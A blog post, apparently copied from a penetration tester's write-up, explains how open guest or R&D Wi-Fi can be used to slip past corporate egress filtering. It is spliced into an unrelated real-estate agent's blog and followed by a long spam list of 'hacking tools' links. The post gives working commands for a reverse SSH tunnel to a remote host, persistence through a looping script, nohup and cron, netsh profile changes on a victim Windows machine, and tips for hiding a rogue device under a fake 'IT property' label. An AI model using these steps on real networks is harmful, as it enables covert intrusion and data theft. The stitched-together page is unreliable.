Twitter Updates

    follow me on Twitter

    List for 4.5% and get 1% cash back on your purchase

    Saturday, August 29, 2020

    Backchannel Data Exfiltration Via Guest/R&D Wi-Fi


    Often times I find unprotected wireless access points with unfettered access to the internet for research or guest access purposes. This is generally through an unauthenticated portal or a direct cable connection. When questioning the business units they explain a low value network, which is simply a internet pass thru separate from the internal network. This sounds reasonable and almost plausible however I usually explain the dangers of having company assets on an unprotected Wi-Fi and the dangers of client side exploits and MITM attacks. But there are a few other plausible scenarios one should be aware of that may scare you a bit more then the former discussion.

    What about using OpenWifi as a backchannel data exfiltration medium?

    An open Wi-Fi is a perfect data exfiltration medium for attackers to completely bypass egress filtering issues, DLP, proxy filtering issues and a whole bunch of other protection mechanisms in place to keep attackers from sending out shells and moving data between networks. This can easily be accomplished via dual homing your attack host utilizing multiple nic cards which are standard on almost all modern machines. Whether this is from physical access breach or via remote compromise the results can be deadly. Below are a few scenarios, which can lead to undetectable data exfiltration.




    Scenario 1: (PwnPlug/Linux host with Wi-Fi adaptor)
    The first useful scenario is when a physical perimeter has been breached and a small device from http://pwnieexpress.com/ known as a pwn-plug is installed into the target network or a linux host with a wireless card. I usually install pwn-plug's inside a closet or under a desk somewhere which is not visible and allows a network connection out to an attacker owned host. Typically its a good idea to label the small device as "IT property and Do Not Remove". This will keep a casual user from removing the device. However if there is network egress and proxy filtering present then our network connection may never reach a remote host. At this point your physical breach to gain network access to an impenetrable network perimeter will fail. Unless there happens to be an open cable Wi-Fi connection to an "inconsequential R&D network".

    By simply attaching an Alpha card to the pwnplug you can connect to the R&D wireless network. You can then use this network as your outgoing connection and avoid corporate restrictions regarding outbound connections via metasploit or ssh. I have noticed that most clients these days are running heavy egress filtering and packet level protocol detection, which stops outbound connections. Rather then play the obfuscation game i prefer to bypass the restrictions all together using networks which have escaped corporate policy.

    You can automate the following via a script if you wardrive the facility prior to entrance and gain insight into the open wireless network, or you can also configure the plug via serial connection on site provided you have time.

    Connect to wifi:
    ifconfig wlan0 up
    iwconfig wlan0 essid [targetNetworkSSID]
    dhclient wlan0

    Run a reverse SSH tunnel:
    ssh -R 3000:127.0.0.1:22 root@remoteHost.com

    On the remote host you can retrieve your shell:
    ssh -p 3000 User@localhost

    Once you have authenticated with the pwnplug via your local host port forward you now have access into the internal network via an encrypted tunnel which will not be detected and fully bypass any corporate security restrictions. You can take this a bit further and setup some persistence in case the shell goes down.. This can be done via bash and nohup if you setup some ssh keys to handle authentication.. One example could be the following script:

    Your bash script: 
    #---------------------
    #!/bin/bash
    while true
    do
     ssh -R 3000:127.0.0.1:22 root@remoteHost.com
     sleep 10
    done
    #---------------------

    Run this with nohup like this:
    nohup ./shell.sh &


    Another simple way would be to setup a cron job to run a script with your ssh command on a specified interval for example every 5 minutes like so:

    Cron job for every 5 minutes: 
    */5 * * * * /shell.sh



    Scenario 2: (Remote Windows Compromise)
    The second scenario is that of a compromised modern windows machine with a wireless card, this can be used to make a wireless connection outbound similar to the first scenario which will bypass restrictions by accessing an unrestricted network. As shown in "Vista Power Tools" paper written by Josh Wright you can use modern windows machines cards via the command line.
    http://www.inguardians.com/pubs/Vista_Wireless_Power_Tools-Wright.pdf

    Below are the commands to profile the networks and export a current profile then import a new profile for your target wireless network. Then from there you can connect and use that network to bypass corp restrictions provided that wireless network doesn't have its own restrictions.

    Profile Victim machine and extract a wireless profile: 
    netsh wlan show interfaces
    netsh wlan show networks mode=bssid
    netsh wlan show profiles
    netsh wlan export profile name="CorpNetwork"

    Then modify that profile to meet the requirements needed for the R&D network and import it into the victim machine.

    Upload a new profile and connect to the network: 
    netsh wlan add profile filename="R&D.xml"
    netsh wlan show profiles
    netsh wlan connect name="R&D"

    If you check out Josh's excellent paper linked above you will also find ways of bridging between ethernet and wireless adaptors along with lots of other ideas and useful information.

    I just got thinking the other day of ways to abuse so called guest or R&D networks and started writing down a few ideas based on scenarios which play out time and time again while penetration testing networks and running physical breach attacks. I hear all to often that a cable connection not linked to the corporate network is totally safe and I call bullshit on that.

    Related news


    1. Pentest Tools Linux
    2. Hacking Tools Hardware
    3. Pentest Tools Download
    4. Top Pentest Tools
    5. Hack And Tools
    6. Pentest Tools Kali Linux
    7. Hacker Tools 2020
    8. Hacker Tools Free
    9. Pentest Tools Find Subdomains
    10. Hacking Tools Windows 10
    11. Hacking Tools Name
    12. Pentest Automation Tools
    13. Hackers Toolbox
    14. Hackers Toolbox
    15. Pentest Tools Framework
    16. Hacking Tools Online
    17. Hacker Tools For Mac
    18. Hacking Apps
    19. Growth Hacker Tools
    20. Hack Tools For Pc
    21. Hacking Tools
    22. Hacking Tools For Windows Free Download
    23. Pentest Tools Website Vulnerability
    24. What Are Hacking Tools
    25. Nsa Hack Tools
    26. Pentest Tools Website
    27. Pentest Box Tools Download
    28. Hack And Tools
    29. Hacking Tools For Kali Linux
    30. Nsa Hack Tools
    31. Pentest Tools Subdomain
    32. Hacker Security Tools
    33. Hack Apps
    34. Hacking Apps
    35. Hacking Tools Pc
    36. Nsa Hack Tools
    37. Hack Tools Download
    38. Pentest Tools Website
    39. Hack Tools For Pc
    40. Pentest Tools Alternative
    41. Hacker Security Tools
    42. Hacker Tools Linux
    43. Pentest Tools Website
    44. Pentest Tools Online
    45. What Are Hacking Tools
    46. Hacker Techniques Tools And Incident Handling
    47. Hacking Tools For Windows 7
    48. Hacker Tools Windows
    49. Hacking Tools Pc
    50. Top Pentest Tools
    51. Hacking Apps
    52. Hacker Tools Apk Download
    53. Free Pentest Tools For Windows
    54. Pentest Tools Nmap
    55. Github Hacking Tools
    56. Best Hacking Tools 2019
    57. Usb Pentest Tools
    58. Hacking Tools For Pc
    59. Hacker Tools Apk Download
    60. Pentest Tools Url Fuzzer
    61. Hacker Tools For Windows
    62. Hacker Tools 2020
    63. Pentest Tools Find Subdomains
    64. What Are Hacking Tools
    65. Wifi Hacker Tools For Windows
    66. Best Hacking Tools 2020
    67. Hacker Tool Kit
    68. Pentest Tools Kali Linux
    69. Hacking Tools For Beginners
    70. Pentest Automation Tools
    71. Pentest Tools Open Source
    72. Hacker Tools Apk Download
    73. Hacker Tools Apk
    74. Growth Hacker Tools
    75. Pentest Tools Open Source
    76. Hack Tools For Pc
    77. Hacker Tools Windows
    78. Hack Tools 2019
    79. Tools For Hacker
    80. Nsa Hack Tools Download
    81. Hacker Tools For Mac
    82. How To Hack
    83. Hackers Toolbox
    84. Pentest Tools Tcp Port Scanner
    85. Hacking Tools Hardware
    86. Pentest Tools Framework
    87. Hack Tools Pc
    88. Hacker Hardware Tools
    89. Hacker Tools Linux
    90. Hacker Tools For Windows
    91. Hacker Tools List
    92. Pentest Tools Url Fuzzer
    93. Pentest Tools Framework
    94. Hacking Tools Pc
    95. Install Pentest Tools Ubuntu
    96. Hacking Tools For Kali Linux
    97. Pentest Box Tools Download
    98. Hacks And Tools
    99. Hacker Tools For Mac
    100. Hacking Tools Hardware
    101. Hak5 Tools
    102. Pentest Tools Linux
    103. Hack Tools 2019
    104. Pentest Tools Windows
    105. Free Pentest Tools For Windows
    106. Hacking Tools For Windows 7
    107. Best Pentesting Tools 2018
    108. Hacking Tools Kit
    109. Usb Pentest Tools
    110. Growth Hacker Tools
    111. Hack Tool Apk
    112. Hacking Tools Software
    113. Tools For Hacker
    114. Pentest Tools Website Vulnerability
    115. Best Pentesting Tools 2018
    116. Hacker Tools Free Download
    117. Hacking Tools And Software
    118. Hack Tools Mac
    119. Pentest Tools Framework
    120. Hacking Tools Kit
    121. Hacking Tools For Windows
    122. Hacker Tools For Windows
    123. Nsa Hacker Tools
    124. Hacker Tools Hardware
    125. Tools Used For Hacking
    126. Pentest Tools Review
    127. Hacking Tools Pc
    128. Pentest Tools Github

    No comments:

    Post a Comment

    Home for sale- $2,000 rebate!

    Ready Real Estate slide show

    Become a fan of my page

    Sheree Dutton, Reatlor, DFW, Texas on Facebook
    Powered By Blogger

    Pandora Faves

    Back on the market, price reduced, 1% cash back rebate offered

    Sheree Dutton | Ready Real Estate | 817-975-0461
    222 Birchwood, Azle, TX
    Back on the market, price reduced and 15 cash back rebate offered!
    3BR/2BA Single Family House
    offered at $102,500
    Year Built 2006
    Sq Footage 1,142
    Bedrooms 3
    Bathrooms 2 full, 0 partial
    Floors 1
    Parking 3 Covered spaces
    Lot Size .225 acres
    HOA/Maint $0 per month

    DESCRIPTION


    Wow, talk about pride of ownership! This house has too many upgrades to count, and is so well cared for. You must see it to believe it! A lot of value in this perfect starter home.

    OPEN HOUSE SUNDAY MAY 3RD 2+5 pm

    see additional photos below
    PROPERTY FEATURES

    - Central A/C - Central heat - Fireplace
    - High/Vaulted ceiling - Walk-in closet - Tile floor
    - Living room - Breakfast nook - Dishwasher
    - Refrigerator - Stove/Oven - Microwave
    - Laundry area - inside - Balcony, Deck, or Patio - Yard

    OTHER SPECIAL FEATURES

    - 1 car garage, covered carport for 2 cars
    - covered wood deck in backyard
    - gutters
    - storage shed
    - newly stained wood fence
    - electric fireplace added, with tile hearth
    - upgraded ceiling fans and light fixtures
    - island in kitchen

    ADDITIONAL PHOTOS


    Fantastic curb appeal

    covered wood deck in back

    living room

    kitchen with island

    breakfast nook

    master bedroom
    Contact info:
    Sheree Dutton
    Ready Real Estate
    817-975-0461
    For sale by agent/broker

    powered by postlets Equal Opportunity Housing
    Posted: Sep 11, 2009, 7:31am PDT

    Blog Archive